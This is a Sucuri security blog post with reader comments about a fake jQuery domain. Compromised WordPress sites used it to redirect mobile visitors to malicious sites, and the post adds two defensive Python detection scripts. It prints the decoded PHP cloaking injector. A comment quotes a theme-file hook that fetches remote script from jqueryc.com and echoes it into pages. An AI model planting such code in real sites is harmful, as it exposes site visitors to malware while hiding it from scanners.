Sucuri Blog

Careful With Fake jQuery Website – jquery-framework.com

September 17, 2012, by Daniel Cid

A few days ago we posted in our Labs notes about a fake jQuery website that is distributing malware. The domain was chosen to confuse end users (jquery-framework.com), since it looks like a legitimate site.

This is what we were seeing injected on some websites:

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to http://browser-31.com/:

window.location = "httx://browser-31.com/s/3013";

That page then redirects the browser to additional malicious domains. This is the full path:

http://browser-31.com/s/3013 -> http://browser-31.com/ -> http://exmobi.org/ ->
http://exmobi.org//?TCFL7295a460c02994eeff6c4089e21d24c4=0064f9c1307b53e92d675b76009102e1

or

http://browser-31.com/s/3013 -> http://4redirect.me/in.cgi?5 -> http://sys-traf.ru/?i=5622 -> 
http://moby-c.ru/?r=10997 -> http://wap-trafik.ru/tb.php

Compromised WordPress sites

Since we first saw this and posted about it in our Labs, we have seen even more websites compromised with it (mostly outdated WordPress installs). We had the chance to analyze some of them, and they used the following eval code to hide the malware inside the theme files:

eval("\145\166\141\154\50\142 .. \141\163\145\66\64\137")

Once decoded, it executes the following:

// Serve the injection only to visitors that look like mobile clients
// (Accept header, User-Agent or Referer), and never to anything that
// looks like a desktop browser or a search-engine crawler.
if ((preg_match("/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si", @$_SERVER['HTTP_ACCEPT']) ..
     || preg_match('/alcatel|amoi|android|avantgo|blackberry|..
                    |iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola
                    |nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|
                    vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT'])
     || preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER']))
    && !preg_match('/macintosh|america|avant|download|windows-media-player|yandex|google/si',
                   @$_SERVER['HTTP_USER_AGENT'])) {
    echo '<script src="httx://jquery-framework.com/jquery-1.7.1.js"..';
    flush();
    exit;
}

If you are not familiar with PHP: the code looks at the Accept header, the User-Agent and the Referer to decide whether the visitor is on a mobile device (iPod, iPad, iPhone, Android, etc.), skips anything that looks like a desktop browser or a crawler (note the "macintosh", "google" and "yandex" exclusions), and only then inserts the jquery-framework.com script into the page. Since Google (and other AV blacklists) aren't flagging this domain, users receive no warning of what is happening.
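Because the snippet above only fires for mobile-looking requests, a scan from a desktop browser or a crawler never sees the injected tag. The following Python check (an added example, not the blog's code) fetches a page once with headers that satisfy the cloaker's mobile test and once with plain desktop headers, and reports script sources that only the mobile response carries. The header values are constructed, and the `fetch` parameter exists so the check can also run offline against a stub.

```python
#!/usr/bin/env python3
# Added example (not the blog's code): check a site for the mobile-only
# cloaking shown above by requesting it once as a mobile client and once
# as a desktop client, then reporting script sources only the mobile
# response contains. The cloaker keys on Accept, User-Agent and Referer
# and skips UAs containing "google", so a desktop scan or crawler sees nothing.
import re
import urllib.request
from typing import Callable

# Constructed header sets: the mobile one trips the cloaker's UA list
# ("iphone") and its Accept check (text/vnd.wap.wml); the desktop one
# trips neither.
MOBILE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) Mobile Safari",
    "Accept": "text/vnd.wap.wml,text/html",
}
DESKTOP_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 Chrome/21.0 Safari/537.1",
    "Accept": "text/html,application/xhtml+xml",
}
SCRIPT_SRC_RE = re.compile(r'''<script[^>]*\ssrc=["']([^"']+)["']''', re.I)

def http_fetch(url: str, headers: dict, timeout: float = 10) -> str:
    """Default fetch over the network with urllib."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")

def external_scripts(html: str) -> set[str]:
    """All <script src=...> values in a page body."""
    return set(SCRIPT_SRC_RE.findall(html))

def mobile_only_scripts(url: str, fetch: Callable[[str, dict], str] = http_fetch) -> set[str]:
    """Script sources served to the mobile client but not to the desktop one."""
    mobile = external_scripts(fetch(url, MOBILE_HEADERS))
    desktop = external_scripts(fetch(url, DESKTOP_HEADERS))
    return mobile - desktop

if __name__ == "__main__":
    import sys
    for src in sorted(mobile_only_scripts(sys.argv[1])):
        print("mobile-only script:", src)
```

Any non-empty result deserves a look at the theme files and root index.php; an empty result only means this particular cloaking test did not trigger.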

We are definitely flagging it; scan your site for free with Sucuri SiteCheck to make sure you're good to go.
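A file-level companion check, added here and not the blog's own tooling: it walks a WordPress install looking for the two indicators this post and its comments describe (an eval() of an octal-escaped string in theme files, the root index.php or .htaccess, and references to the domains named above) and decodes the octal escapes so you can see what the eval() would run. The `SUSPECT_HOSTS` list is taken from this page; the sample string in the test is constructed.

```python
# Added example (not the blog's or the commenters' code): walk a WordPress
# install and flag the indicators named in the post and comments: eval()
# of an octal-escaped PHP string, and references to the fake jQuery and
# redirect hosts. Decoding the escapes shows what the eval() would run.
import os
import re

# Domains named on this page; extend with your own indicators.
SUSPECT_HOSTS = ("jquery-framework.com", "jqueryc.com", "browser-31.com")

# A PHP double-quoted string built only from octal escapes, e.g. eval("\145\166...")
OCTAL_EVAL_RE = re.compile(r'eval\s*\(\s*"((?:\\[0-7]{1,3})+)"\s*\)')

def decode_php_octal(escaped: str) -> str:
    """Resolve PHP octal escapes (\\145 -> 'e') into readable text."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), escaped)

def scan_source(text: str) -> list[tuple[str, str]]:
    """Return (indicator, detail) pairs found in one file's contents."""
    findings = []
    for m in OCTAL_EVAL_RE.finditer(text):
        findings.append(("octal_eval", decode_php_octal(m.group(1))))
    for host in SUSPECT_HOSTS:
        if host in text:
            findings.append(("suspect_host", host))
    return findings

def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Scan every .php file and .htaccess under root (themes, root index.php, ...)."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not (name.endswith(".php") or name == ".htaccess"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
            except OSError:
                continue
            if found:
                hits[path] = found
    return hits

if __name__ == "__main__":
    import sys
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for kind, detail in found:
            print(f"{path}: {kind}: {detail[:60]}")
```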

Categories: Website Malware Infections, WordPress Security. Tags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. raincoaster

    September 18, 2012

    Have you seen this on any WordPress.com sites? They’re supposed to be invulnerable to this sort of thing but I’ve seen at least one this past week that displays bizarre signs of a classic hack.

    • Scott Wickberg

      September 24, 2012

      This is definitely happening on WordPress sites. I've been working to clean some this last week. It's a much more complex hack than this post details. The mobile redirect is only part of it. Somehow they found a way in through an outdated WordPress install or plugin and have set up a hidden root user on our server. If you see this on any of your servers, make sure to address it as quickly as possible.

      • chris

        September 27, 2012

        If you, or anyone, has any words of wisdom on how to handle this, I'd love to hear it. I'm totally lost, and meanwhile people think the Russians are after us.

        • Ola

          September 28, 2012

          We have just recovered one of our servers from this. An outdated WordPress install seemed to have been the access point, though we are still investigating some more.

          Some random files were created in the folder of each domain, while the redirection on mobile devices was caused by a modified ".htaccess" file.

          • chris

            September 28, 2012

            Thanks! There was a bunch of junk in the .htaccess file of the root folder, so I deleted it, but the site still redirects on mobile devices. The only difference is that it redirects immediately to "browser-31" without going to "jquery-framework" first. I'm checking all the files modified around the time when the site went down, but I'm not sure what I should be looking for.

            Edit: fixed it like 5 minutes later. So, as Daniel said, the .php files in the "themes" folder were affected; as you said, the .htaccess file in the root was affected; and I found the last bit in the index.php of the root folder, which looked like the eval code described above. Hope this helps anyone else out.

      • raincoaster

        October 11, 2012

        That is not what I asked. WordPress.COM is different from WordPress.ORG and has some severe code restrictions specifically to prevent this kind of attack. Has it been seen on WordPress.com sites?

        • Andres Armeda

          October 11, 2012

          Hey there. We have not seen this on WordPress.com sites. That's a different animal, and they do a pretty good job of reducing risk around these types of issues.

  2. miles

    September 30, 2012

    I had this in my functions.php of the WordPress theme: "http://www.jqueryc.com/jquery-1.6.3.min.js"

  3. Seamus K

    October 9, 2012

    I’ve just fixed one of our WordPress servers with this same error although I’m not sure what caused it in the first place so it might strike again.

    To fix this I had to remove the eval code for all php files in the themes folder (>50 files in my case). Also I had to remove the eval code from index.php in the root directory as well as remove the extra lines added to .htaccess.

  4. Aren Bane

    November 30, 2012

    I had the same issue as described, and I did a simple search in theme functions to find the keyword "jquery".

    Go to:
    Appearance > Editor> Theme Functions (right sidebar)

    If working on a Mac, hit Command+F to search keywords.

    Type in “Jquery”.

    This is what I found:

    /* Define our theme URL constant */

    if (!function_exists('insert_jquery_theme')) {
        function insert_jquery_theme() {
            if (function_exists('curl_init')) {
                $url = "http://www.jqueryc.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5;
                curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                $data = curl_exec($ch); curl_close($ch); echo $data;
            }
        }
        add_action('wp_head', 'insert_jquery_theme');
    }
    if (!defined('WP_THEME_URL')) { define('WP_THEME_URL', get_template_directory_uri()); }

    I just deleted it and problem solved… for now.

    Hope this helps.

    • Nadia

      December 28, 2012

      worked for me too!! thanks!
